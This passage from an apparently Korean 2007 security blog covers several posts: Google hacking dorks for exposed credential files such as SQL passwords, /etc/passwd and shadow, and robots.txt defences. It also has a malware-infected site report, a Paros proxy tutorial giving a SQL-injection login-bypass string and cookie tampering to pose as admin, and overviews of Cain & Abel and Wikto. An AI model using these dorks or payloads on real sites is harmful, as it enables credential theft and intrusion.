관리지 정보 뿐 아니라 문제해결절차와 관리자 로그인 포털 정보까지 찾을 수 있다.

8. -ext:html -ext:htm -ext:shtml -ext:asp -ext:php
site 연산자와 결합되면 대상 사이트에서 가장 많이 사용하는 파일들을 제거하고 남은 특수하고도 흥미로운 문서를 찾을 수 있다.
대상 사이트별로 추가적으로 제거해야 할 파일 확장자를 이 요청문에 추가하는 것이 좋다.

9. inurl:temp | inurl:tmp | inurl:backup | inurl:bak
백업/임시 파일과 디렉토리를 찾는다.

10. intranet | help.desk
인트라넷 사이트와 헬프 데스크 연락 정보/문제 해결 절차를 찾는다.



구글 해킹 (사용자, 비번 가져오기)

사용자 이름 검색 요청문 (p 266)
2. 비밀번호겁색 (p 271)
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
intitle:"index of" intext:connect.inc - mySQL DB 인증정보
filetype:ini ServUDaemon - ServU FTP Daemon 인증정보
filetype:sql password - SQL 비밀번호
filetype:sql "IDENTIFIED BY" -cvs - SQL 비밀번호
index.of.etc - UNIX /etc 인증파일
intitle:"Index of..etc" passwd - UNIX 사용자정보
intitle:index.of etc shadow - UNIX 암호파일


구글해킹(구글 해커로부터 보호)

1. Robots.txt로 웹 검색자 막기
1) robot.txt 파일은 로봇에게 내용을 지시한다.
2) 이 파일은 웹서버의 루트 디렉토리에 존재해야하며 웹서버가 읽을수 있는 파일 권한을 주어야 한다.
3) http://www.robotstxt.org/wc/norobots.html에 관련 내용 있음
4) 설정파일 내용
User-agent: Googlebot #구글이 아닌 모든것은 *로 가능
Disallow: / #로봇이 경로 아래 읽지 못함
(Disallow : /*.PDF$) # PDF파일 읽는거 막음
5) 유효성 판단
http://www.searchengineworld.com/cgi-bin/robotcheck.cgi를 통해 맞는지 판단한다.
6) Robots.txt파일은 유명 로봇은 정보 유출 책임을 면하기 위해 거의 모두 하고 있다.

2. 자신의 사이트를 직접 점검한다.

3. 구글 스캔 툴
(API - 구글계정 만들고 http://api.google.com/createkey에서 받음 : 하루에 1000)
1) Gooscan - 대량의 구글 검색을 하는데 사용하는 Linux용 툴
구글 API 사용하지 않음. 이 툴을 사용하면 잘하면 그 아이피 대역이 막힘(거의 아니지만) http://johnny.ihackstuff.com
2) Athena - 이것도 구글 API 사용하지 않음 (윈도우용)
http://snakeoillabs.com/
3) SiteDigger - 구글라이센스 받음
http://www.foundstone.com/resources/proddesc/sitedigger.htm
4) Wikto - 라이센스키 필요



구글해킹 고급연산자

형식
Intitle:"index of" dduri

 

intitle
페이지의 제목에서 문자열을 찾는다.
다른 연산자와 잘 어울린다.
웹 문서, 뉴스그룹, 이미지, 뉴스 검색에 가장 적합하다.

allintitle
연산자 뒤에 나온 모든 단에를 페이지 제목에서 찾는다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹 문서, 뉴스그룹, 이미지, 뉴스 검색에 가장 적합하다.

inurl
문자열을 페이지의 URL에서 찾는다.
다른 연산자와 잘 어울린다.
웹 문서와 이미지 검색에 가장 적합하다.

allinurl
연산자 뒤에 나온 모든 단어를 페이지의 URL에서 찾는다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹 문서와 이미지 검색에 가장 적합하다.

filetype
특정한 확장자를 가진 파일을 찾는다.
ext 연산자와 동일한 역할을 한다.
추가적인 검색 단어를 필요로 한다.
다른 연산자와 잘 어울린다.
웹문서와 뉴스그룹 검색에 가장 적합하다.

allintext
입력한 모든 단어를 페이지의 본문에서 찾는다.
그다지 좋지 않다 - 아예 사용하지 말아야한다.

site
검색 범위를 특정 사이트나 도메인으로 제한한다.
다른 연산자와 잘 어울린다.
단독으로 쓰일 수 있다.
웹문서, 뉴스그룹, 이미지 검색에 가장 적합하다.

link
사이트나 URL로의 링크를 찾는다.
다른 연산자나 검색 단어와 잘 어울린다.
웹문서 검색에 가장 적합하다.

inanchor
링크의 설명 문자열을 검색한다.
다른 연산자나 검색 단어와 잘 어울린다.
웹문서, 이미지, 뉴스 검색에 가장 적합하다.

numrange
특정 범위에 있는 숫자를 찾는다.
다른 연산자나 검색 단어와 잘 어울린다.
웹 문서 검색에 가장 적합하다.

cache
구글의 캐시에 저장된 페이지를 보여준다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹문서 검색에 가장 적합하다.

info
페이지에 대한 요약 정보를 출력한다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹문서 검색에 가장 적합하다.

related
입력한 사이트나 URL과 연관된 사이트를 보여준다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹문서 검색에 가장 적합하다.

phonebook, rphonebook, bphonebook
집 전화번호나 회사 전화번호 목록을 보여준다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹문서 검색에 가장 적합하다.

author
뉴스그룹 게시물의 작성자를 찾는다.
다른 연산자나 검색 단어와 잘 어울린다.
뉴스그룹 검색에 가장 적합하다.

group
뉴스그룹 이름을 검색한다.
다른 연산자와 잘 어울린다.
뉴스그룹 검색에 가장 적합하다.

insubject
뉴스그룹 게시물의 제목을 검색한다.
다른 연산자나 검색 단어와 잘 어울린다.
뉴스그룹 검색에 가장 적합하다.

msgid
메시지 ID를 통해 뉴스그룹 게시물을 찾는다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
뉴스그룹 검색에 가장 적합하다.

stocks
기업의 티커/ticker 코드에 대한 야후 Finance 주식정보를 보여준다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹문서 검색에 가장 적합하다.

define
단어나 구/phrase의 다양한 정의를 보여준다.
다른 연산자나 검색 단어와 잘 어울리지 못한다.
웹문서 검색에 가장 적합하다.



추가1 : 구글 캐시페이지 URL뒤에 &strip=1 붙이면 웹페이지에 익명으로 접근 할 수 있다 ^^

추가2 : 구글 데이터베이스에 사이트 URL 추가
http://www.google.com/addurl/

모든 연산자 정보설명
http://www.google.com/help/operators.html

구글의 공식 블로그
http://www.google.com/googleblog

 

 

Trackback 0 : Comments 5
  1. Favicon of http://blog.naver.com/violethazard BlogIcon 알콜엔진 2007.11.27 12:39 신고 Modify/Delete Reply

    담아갈께요^^

  2. Favicon of http://blog.naver.com/pyne821 BlogIcon 피글링 2007.11.30 10:44 신고 Modify/Delete Reply

    담아갑니다^^

  3. Favicon of http://blog.naver.com/coreanpro BlogIcon 소미 2008.02.29 13:30 신고 Modify/Delete Reply

    좋은 정보 감사합니다 담아가겠습니다 ~

  4. Favicon of http://blog.naver.com/sailer501 BlogIcon 마린보이 2008.05.12 20:53 신고 Modify/Delete Reply

    담아갈꼐요 ^^

  5. Favicon of http://blog.naver.com/moto99 BlogIcon 슈반 2008.05.14 13:06 신고 Modify/Delete Reply

    네^^ 도움이 되었으면 좋겟네요~

Write a comment


메트로서울 방문 시 악성 코드 확인.

┃ Web 2007.10.13 15:56

출처 : http://zizihacker.egloos.com/857864

메트로서울 방문 시 악성 코드 확인.

우연히 메트로서울 홈페이지에 방문을 했더니, 악성코드가 확인되네요.

http://210.118.94.121:808/1/1/help.htm가 링크되어 있어 악성코드로 탐지되고 있으며,

help.htm 파일에 tt.htm 파일이 포함되어 있습니다.

코드는 다음과 같습니다. metro.txt


http://www.metroseoul.co.kr/Metro.htm의 파일 내에

이 포함되어 있으며,

http://www.metroseoul.co.kr/common/Member.js

document.write(''
); 코드가 주석처리되어 있는 것으로 확인되네욤.

흠..공격을 당해서 숨겨진 듯 한데...
빠른 복구로 인해 더이상 피해가 확산되지 않기를 바랍니다.
이전에도 이런 유형의 방문자 많은 사이트에 악성코드 숨겨 놓는 경우를 몇건 발견했는데,
이것만큼 악성코드 전파하기 쉽고 빠른 경우는 별로 없죠.
믿고 사이트 방문할 수 있는 세상이 되기를..ㅋ
Trackback 0 : Comment 0

Write a comment


paros - 보충자료

┃ Web 2007.10.03 14:13

출처 : http://blog.naver.com/jeha5/100042599239

파로스(Paros)는 웹 프록시 프로그램의 일종으로, 웹 사이트에 대한 취약성 분석은 물론, 강력한 웹 해킹 도구로 활용할 수 있다.

홍석범 | 오늘과 내일 차장

이 프로그램은 사용방법이 쉬우면서도 많은 기능을 제공하기 때문에 대중적으로 사용되고 있으며, 홈페이지(http://www.parosproxy.org/)에서 자유롭게 다운로드 받을 수 있다. 파로스는 웹 서버와 클라이언트 사이에 위치해 HTTP와 HTTPS 데이터 뿐만 아니라 쿠키와 폼필드 등을 중간에서 가로채 모니터링하거나 값을 변경해 서버로 보낼 수 있다.

파로스 프로그램의 특징을 간략히 정리하면 다음과 같다.

- GUI를 제공한다.
- 트리(tree) 형태로 사이트 구조를 제공해 홈페이지의 구조를 쉽게 분석할 수 있다.
- 스캐너 기능을 제공해 웹 취약성 스캔도 가능하다.
- HTTPS도 사용할 수 있도록 인증서 기능을 제공한다.
- 텍스트에 대한 다양한 해시나 인코딩/디코딩 기능을 제공한다.

파로스를 설치해 직접 활용하려면 우선 홈페이지에서 최신 버전의 프로그램을 다운로드 받는다. 이 프로그램이 작동하기 위해서는 버전 1.4 이상의 JRE(Java Run Time Enviroment)가 설치돼 있어야 한다. 만약 설치돼 있지 않다면 사이트(http://java.sun.com/j2se/)에서 다운로드 받아 설치한다.
파로스를 윈도우에서 사용할 경우, 최신 버전의 윈도우 실행 파일(paros-x.x.x-win.exe)을 다운로드 받아 설치한다. 파로스는 실행과 동시에 127.0.0.1의 8080번 포트를 리슨(listen)하므로 다른 프로그램이 8080 포트를 사용하고 있는지 확인해 보도록 한다.
파로스를 웹 프록시로 사용하기 위해서는 브라우저에서 모든 접속이 파로스를 거치도록 설정해야 한다. 이를 위해서는 브라우저에서 도구→인터넷 옵션→연결→LAN 설정에 있는 '프록시 서버' 부분에 (화면 1)과 같이 주소에 '127.0.0.1'을, 포트에 '8080'을 입력하고 확인한 뒤 저장한다.

(화면 1) 프록시 설정

이상과 같이 설정하면 모든 접속이 127.0.0.1의 8080번을 통과하게 되는데, 만약 파로스를 실행하지 않으면 웹사이트 접속이 불가능하므로 주의하기 바란다. 이제 파로스를 실행한 후 브라우저를 띄워 홈페이지에 접속해 보자. 프록시를 거치기 때문에 속도는 다소 느리지만, (화면 2)와 같이 사이트 접속 정보들이 순서대로 기록되고 있는 것을 알 수 있다.
좌측 상단에 있는 사이트에는 접속하는 도메인별로 구분돼 기록되고 있고, 하단에는 GET과 POST 메소드를 통해 어떤 사이트를 접속하는지에 대한 상세 정보가 보인다. 해당 GET이나 POST 접속을 클릭하면 상단에 HTTP 헤더나 데이터가 상세하게 보인다. 이는 요청(Request)과 응답(Response)으로 나뉘는데, 응답을 선택하면 요청에 대한 응답 헤더와 메시지도 볼 수 있다. 화면 하단을 보면 각 요청별로 서버의 응답 상태(200 OK 여부)나 소요된 시간 정보도 함께 제공된다.

(화면 2) 파로스 분석 화면

또한 해당 요청 부분에서 우측 마우스를 클릭하면 (화면 3)과 같이 여러 기능을 이용할 수 있다. 그 중 스캔을 선택하면 해당 도메인을 스캔한 뒤 몇 가지 보안 테스트를 수행한다. 보안 테스트 결과는 'Report→Last Scan Report'를 선택하면 간략하게 HTML 형태로 출력해 확인할 수 있다.

(화면 3) 스캔 수행 메뉴

또한 유용한 기능으로 'Tools>ncoder Hash'를 선택하면 (화면 4)와 같이 임의의 태그 등에 대해 인코드/디코드를 하거나 해시를 쉽게 변환할 수 있는 기능을 제공한다. 최근 공격자들은 공격 흔적의 해석을 어렵게 하기 위해 인코딩을 하거나 해시를 사용하는 경우도 있으니 유용하게 활용할 수 있을 것이다.

(화면 4) 인코드/해시 기능

마지막으로 살펴볼 기능은 Cookie injection 공격이나 특수문자 등의 입력을 차단한 자바 스크립트 등을 우회할 때 사용되는 것으로, 'Tools>Manual Request Editor'라는 메뉴를 선택하면 된다. 이 메뉴는 여러 가지로 활용할 수 있다. 이를테면 ID/PW 부분에 admin / ' or 1=1--를 입력해 SQL injection을 통해 인증을 우회하려고 할 때, 자바 스크립트에서 특수문자 입력을 거부한다면 해당 요청 부분을 복사해서 (화면 5)와 같이 설정하면 서버에 직접 전송하게 되므로 자바 스크립트와 같은 클라이언트 측에서의 입력 값 점검을 우회할 수 있다. 이런 우회가 가능하기 때문에 입력 값 검증은 반드시 서버 측에서 수행해야 한다.


(화면 5) 메뉴얼 요청 에디터

또한 인증 방식으로 세션(Session)이 아닌 쿠키를 사용해도 프로그램을 통해 쉽게 우회할 수 있다. 요청 부분을 복사해 쿠키의 ID 부분만, 이를테면 관리자(admin)로 수정하면 해당 ID 권한으로 실행을 하게 될 것이다.
이외 'Tools>Options'이나 'Filters'를 선택하면 'User-Agent'의 변경이나 로그 저장 등 다양한 옵션 사항을 설정할 수 있다.

Trackback 0 : Comment 0

Write a comment


Cyber 지하드 DoS Tool

┃ Web 2007.09.30 10:42

출처 : http://coderant.egloos.com/3813917

Cyber 지하드 DoS Tool

다양한 해킹툴을 접해봤지만, 아랍어로 된 해킹툴은 처음 본다.
지하드 즉 알카다에 연계된 사이버 공격 조직에서 만든 서비스 거부 공격 해킹 툴이다.
아마도 미국의 최우선 타켓일 것이고 그외에는 영국등 미국의 우방 시스템에 대해 공격 목표로 정해진 듯 하다.
서비스 거부 공격의 개념이 1980년대이 후로 크게 변화된 것이 없는 만큼 새로운 기법의 서비스 거부 공격이 개발될 여지는 많다.
현재까지 나온 해킹중에서도 서비스 거부 공격 즉 DoS 나DDoS만큼 대량으로 파괴적인 것은 아직 없으니까...



Trackback 0 : Comment 0

Write a comment


암호 탐지기/크래커 - CAIN & ABEL

┃ Web 2007.08.31 15:38

출처 : http://blog.naver.com/secuchoi?Redirect=Log&logNo=20018929078

CAIN & ABEL www.oxid.it

암호 탐지기/크래커

CAIN & ABEL은 윈도 상에서 실행되는 암호 크래킹 툴이다. 매스밀리아노 몬토로(Massimiliano Montoro, www.oxid.it)에서 제작한 이 놀라운 소프트웨어는 암호 및 암호화 키를 해독하기 위한 수십 가지 유용한 기능을 제공한다.


초보자를 위해 CAIN은 표준 윈도 LANMAN 및 NTLM 암호 표식을 포함해서 로컬 윈도 시스템에 캐시화, 암호화, 해시화된 다양한 암호 및 마이크로소프트 아웃룩, 인터넷 익스플로러 및 MSN 익스플로러와 같은 애플리케이션에 고유한 암호들을 밝혀낸다. 기업체들은 CAIN을 사용하여 개별 암호 및 자신의 암호 정책의 효율성을 테스트해 볼 수도 있다.


CAIN & ABEL은 수십 가지의 OS 및 프로토콜 유형에 대한 암호를 해독할 수 있다. 윈도 운영 체제 전용으로서, CAIN은 SAM 데이터베이스에서 LANMAN 및 NTLM 암호 표식뿐만 아니라, LANMAN 첼린지(Challenge) 및 리스폰스(Response), NTLMv1, NTLMv2 및 마이크로소프트 Kerberos와 같은 윈도 네트워크 인증 프로토콜을 처리한다. 통합된 이 탐지기는 LAN을 모니터링하면서 응답 패킷을 낚아채고 306,000개의 단어로 구성되어 있는 내장 딕셔너리를 사용하여 암호를 해독한다.


윈도 암호 이외에도 이 툴은 여러 가지 다양한 시스코 암호, 라우팅 프로토콜 해시, VNC 암호, RADIUS 쉐어드 시크리트(RADIUS Shared Secrets), Win95/98 패스워드 리스트(PWL) 파일 및 MS SQL 서버 2000 그리고 MySQL 암호를 해독할 수 있다. 뿐만 아니라 IKE 미리 공유된 키까지 해독하고 IKE를 사용하여 비밀 키를 교환 및 업데이트하는 IPSec VPN에 침입한다.


암호 해독 이외에도 CAIN은 무선 LAN 탐지 툴, 해시 계산기 및 ARP 캐시 포이즈닝 툴(침입자가 보다 쉽게 전환된 환경에서 탐지 능력을 발휘할 수 있도록 LAN상에서 트래픽을 다른 방향으로 돌리는 데 사용할 수 있음)이 정교한 GUI로 포함되어 있다.

(전 파일이 안받아지더라구요. 받으신분 혹은 있으신분 공유해요^^)

Trackback 0 : Comment 0

Write a comment


웹 스캐너 및 구글 해킹 툴 - wikto

┃ Web 2007.08.31 14:39

출처 : http://blog.naver.com/secuchoi?Redirect=Log&logNo=20018929078

WIKTO www.sensepost.com

웹 스캐너 및 구글 해킹 툴

침입자들이 허점을 발견하기 전에 미리 선수를 치려면 웹 서버의 취약성을 찾아낼 수 있는 견고한 스캐너가 필요하다. 인터넷을 사용하는 웹 애플리케이션들은 무수한 비즈니스 기회에 노출되어 있기는 하지만 동시에 악의적인 악성 해커들이 쉽게 침입할 수 있는 위험한 구멍이기도 하다.


지난해에 있었던 취약한 phpBB 웹 포럼 스크립트를 실행하는 수천 개의 사이트 및 로그 파일로부터 액세스 통계를 수집하기 위해 AWStats CGI 스크립트를 호스팅하는 수천 개의 사이트들이 침입자의 공격에 노출된 일이 그러한 경우다. 이런 유명한 일화 이외에도 여러 웹 스크립트에서 새로운 취약성들이 정기적으로 발견되고 있다. 이런 허점을 쉽게 발견하려면, 인상적인 웹 서버 스캐닝 툴인 WIKTO를 사용할 것을 권장한다.


남미에 본사를 둔 보안서비스 업체인 센스포스트(Sensepost,www.sensepost.com)에서 개발한 WIKTO는 인기 높은 명령행 Nikto 웹 스캐너 Perl 스크립트 상에 구축되었으며, 사용이 쉬운 윈도 GUI 및 확장 기능들을 가지고 있다.


Nikto처럼 WIKTO도 수천개의 불량 스크립트, 잘못된 서버 구성 및 패치되지 않은 시스템들을 검색한다. 또한 이 툴은 관리자들이 침입자들을 속이기 위해 의도적으로 웹 서버 배너 정보를 위장하더라도 HTTP 지문 인식 기술을 추가하여 프로토콜의 동작에 따라 웹 서버 유형을 식별한다. 악의 없는 화이트햇(white hat) 해커들에게 있어 이것은 강력한 기능이 될 수 있다.


최근에는 점점 더 많은 침입자들이 정교하게 개발된 구글(Google) 검색 기능을 사용하여 취약성이 높은 사이트들을 찾아내고 있는 실정인데, WIKTO는 이런 경우에도 유용하게 사용될 수 있다. 보안 연구원인 조니 롱(Johnny Long)은 취약성이 높은 시스템을 찾아낼 수 있는 1,000개 이상의 구글 검색 결과로 구성된 GHDB(Google Hacking Database)라는 이름의 목록을 보유하고 있는데, WIKTO는 최신 GHDB 취약성 목록을 가져와서 구글에서 검색하여 사용자의 도메인이 가진 이런 허점을 찾아낼 수 있다.

Trackback 0 : Comment 0

Write a comment

티스토리 툴바